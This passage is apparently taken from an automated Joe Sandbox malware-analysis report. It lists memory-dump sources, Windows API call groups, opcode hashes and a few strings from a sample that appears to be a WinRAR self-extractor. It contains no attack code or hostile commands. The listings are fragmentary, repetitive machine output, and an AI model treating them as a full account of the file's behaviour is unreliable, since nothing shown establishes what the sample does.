                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3118131910-0
                                                                                    • Opcode ID: 0512362e9904805e0142b42f5f3022b8d29620ae2009e93965c346b327072630
                                                                                    • Instruction ID: ab047c0586c1a2d96ad979ef11d2d4850958199e55bcf1c7bb3302616895f98c
                                                                                    • Opcode Fuzzy Hash: 0512362e9904805e0142b42f5f3022b8d29620ae2009e93965c346b327072630
                                                                                    • Instruction Fuzzy Hash: BD21EA72E1878289EA10AF28E44112EE360FF95B95F900331EBAD4669DDF3CD542C618
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 1203560049-0
                                                                                    • Opcode ID: 9f9aa67a1aa4d3da2ee12ed50ecbdca65ba24de9cc1849af6890b733dfe98275
                                                                                    • Instruction ID: 5ea43cc2e3850e1ea33b644f96e9c3af2d75bfb1dca7c8fafff514482a578951
                                                                                    • Opcode Fuzzy Hash: 9f9aa67a1aa4d3da2ee12ed50ecbdca65ba24de9cc1849af6890b733dfe98275
                                                                                    • Instruction Fuzzy Hash: B2219A72A1864145EA11AB2CE444129E361FBDA795F900331EBAD42699DF3CD5428718
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: edf978b1599f70b01789e90294df5d0059fd5f91f22ff7a19e628bf16fffa7ce
                                                                                    • Instruction ID: fc19c8ee1f12434792f1c3482550d36aff98c5e75894e8900529ceb091160291
                                                                                    • Opcode Fuzzy Hash: edf978b1599f70b01789e90294df5d0059fd5f91f22ff7a19e628bf16fffa7ce
                                                                                    • Instruction Fuzzy Hash: E8E01230A147054EFA047F29989527DE252AF66743F944438DA0A0335ACE3DA44B4224
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID: R
                                                                                    • API String ID: 3668304517-1466425173
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastPointer
                                                                                    • String ID:
                                                                                    • API String ID: 2976181284-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 1746051919-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: File$BuffersFlushTime
                                                                                    • String ID:
                                                                                    • API String ID: 1392018926-0
                                                                                    APIs
                                                                                    • DloadMakePermanentImageCommit.DELAYIMP ref: 00007FF7B8F211F5
                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?,00000000,00007FF7B8F20F76,?,?,?,00007FF7B8F2135D), ref: 00007FF7B8F2124E
                                                                                    Similarity
                                                                                    • API ID: CommitDloadImageMakePermanentProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 1359380325-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastPointer
                                                                                    • String ID:
                                                                                    • API String ID: 2976181284-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: ItemRectTextWindow$Clientswprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3322643685-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: LoadString
                                                                                    • String ID:
                                                                                    • API String ID: 2948472770-0
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7B8F0E515,?,?,?,?,00007FF7B8F04ADA,?,?,?,00007FF7B8F04A66), ref: 00007FF7B8F0E4C4
                                                                                    • GetProcessAffinityMask.KERNEL32 ref: 00007FF7B8F0E4D7
                                                                                    Similarity
                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                    • String ID:
                                                                                    • API String ID: 1231390398-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                    • String ID:
                                                                                    • API String ID: 1173176844-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 485612231-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    APIs
                                                                                      • Part of subcall function 00007FF7B8F02A30: CreateDirectoryW.KERNELBASE(?,?,?,00007FF7B8F00E19), ref: 00007FF7B8F02A7A
                                                                                      • Part of subcall function 00007FF7B8F02A30: CreateDirectoryW.KERNEL32 ref: 00007FF7B8F02AE2
                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7B8EFE13F
                                                                                      • Part of subcall function 00007FF7B8F02680: GetFileAttributesW.KERNELBASE(?,?,?,?,00007FF7B8F0DDF6,?,?,?,00000000,?), ref: 00007FF7B8F026AB
                                                                                      • Part of subcall function 00007FF7B8F02680: GetFileAttributesW.KERNELBASE ref: 00007FF7B8F026FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesCreateDirectoryFile$_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 1060281209-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString$_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 2323602097-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 1011579015-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                    • String ID:
                                                                                    • API String ID: 3947729631-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                    • String ID:
                                                                                    • API String ID: 680105476-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID:
                                                                                    • API String ID: 3215553584-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: ClassName
                                                                                    • String ID:
                                                                                    • API String ID: 1191326365-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1464966427-0
                                                                                    APIs
                                                                                    • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7B8F22264
                                                                                      • Part of subcall function 00007FF7B8F24010: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF7B8F24018
                                                                                      • Part of subcall function 00007FF7B8F24010: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF7B8F2401D
                                                                                    Similarity
                                                                                    • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                    • String ID:
                                                                                    • API String ID: 1208906642-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: File
                                                                                    • String ID:
                                                                                    • API String ID: 749574446-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: FileType
                                                                                    • String ID:
                                                                                    • API String ID: 3081899298-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory
                                                                                    • String ID:
                                                                                    • API String ID: 1611563598-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: AllocHeap
                                                                                    • String ID:
                                                                                    • API String ID: 4292702814-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2962429428-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: AllocHeap
                                                                                    • String ID:
                                                                                    • API String ID: 4292702814-0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$wcscpy$CloseDirectoryFileHandleRemove$CreateErrorLast$Concurrency::cancel_current_taskControlCurrentDeleteDeviceProcess
                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                    • API String ID: 938441313-3508440684
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$Concurrency::cancel_current_task
                                                                                    • String ID: %ls$%s: %s
                                                                                    • API String ID: 4078585566-2259941744
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                    • API String ID: 1759834784-2761157908
                                                                                    Similarity
                                                                                    • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                                                    • String ID: rtmp
                                                                                    • API String ID: 3587137053-870060881
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Dialog$Concurrency::cancel_current_taskItemText
                                                                                    • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                    • API String ID: 2526813639-1315819833
                                                                                    Similarity
                                                                                    • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 1693479884-0
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-3916222277
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 3140674995-0
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 1239891234-0
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    APIs
                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B8F2E9E4
                                                                                      • Part of subcall function 00007FF7B8F26864: GetCurrentProcess.KERNEL32(00007FF7B8F2FBED), ref: 00007FF7B8F26891
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                    • String ID: *?$.
                                                                                    • API String ID: 2518042432-3972193922
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Create$EventNamedPipe
                                                                                    • String ID: \\.\pipe\
                                                                                    • API String ID: 412621846-91387939
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: memcpy_s
                                                                                    • String ID:
                                                                                    • API String ID: 1502251526-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: ErrorFormatFreeLastLocalMessage
                                                                                    • String ID:
                                                                                    • API String ID: 1365068426-0
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .
                                                                                    • API String ID: 0-248832578
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise_clrfp
                                                                                    • String ID:
                                                                                    • API String ID: 15204871-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                    • String ID:
                                                                                    • API String ID: 1061551593-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                    • String ID:
                                                                                    • API String ID: 2169056816-0
                                                                                    APIs
                                                                                      • Part of subcall function 00007FF7B8F01890: CreateFileW.KERNELBASE ref: 00007FF7B8F0196E
                                                                                      • Part of subcall function 00007FF7B8F01890: GetLastError.KERNEL32 ref: 00007FF7B8F01981
                                                                                      • Part of subcall function 00007FF7B8F01890: CreateFileW.KERNEL32 ref: 00007FF7B8F019E3
                                                                                      • Part of subcall function 00007FF7B8F01890: GetLastError.KERNEL32 ref: 00007FF7B8F019EC
                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7B8F009D0
                                                                                    Similarity
                                                                                    • API ID: CreateErrorFileLast$_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 1381046063-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: Version
                                                                                    • String ID:
                                                                                    • API String ID: 1889659487-0
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID: 0
                                                                                    • API String ID: 3215553584-4108050209
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: gj
                                                                                    • API String ID: 0-4203073231
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    Similarity
                                                                                    • API ID: HeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 54951025-0
                                                                                    • Opcode ID: 820732c4663d1a1f89e8b30917ba5da5edfb3a61d737e51b2e4aaca6b582d31a
